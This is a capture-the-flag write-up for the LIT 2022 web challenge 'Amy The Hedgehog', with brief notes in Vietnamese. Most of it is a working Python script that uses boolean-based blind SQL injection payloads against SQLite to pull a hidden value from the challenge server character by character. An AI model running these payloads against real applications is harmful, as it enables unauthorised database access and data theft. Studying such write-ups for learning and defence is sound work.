# LIT 2022

## web/Amy The Hedgehog

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FOOyYD1K7eKWbZnIMa55M%2Fimage.png?alt=media\&token=be033fba-3cd5-4ab3-849c-6069d7f0b664)

```
import requests, string

url = "http://litctf.live:31770/"
s = requests.session()
passwordRetrieve = ""
# ' or (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('some_char')--
# find column from table: ' or (SELECT hex(substr(sql,{index},1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('{char}')-- 
alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c"
def solve():
    global passwordRetrieve
    index = 1
    len_of_password = 14 - index
    for i in range(len_of_password):
        for char in alpha:
          passwordfield = f"' or (SELECT hex(substr(name,{index},1)) FROM names) = hex('{char}')--"
          postParam = {'name': passwordfield}
          response = s.post(url, data=postParam).text
          if "You got it"  in response:
              passwordRetrieve += char
              index += 1
              print("Nai here yr pass: ",passwordRetrieve, "  len:",i)
              break
          print(char)
solve()
```

* Xác định SQLite -> sqlite\_master -> tbl\_name -> column -> name
* [doc1](https://freetuts.net/lenh-select-trong-sqlite-1731.html)
* [doc2](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md#boolean---count-number-of-tables)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2F0T7hVW8cvGVn094OPPLn%2Fimage.png?alt=media\&token=f9049032-7015-4f3a-ae07-1891400b88be)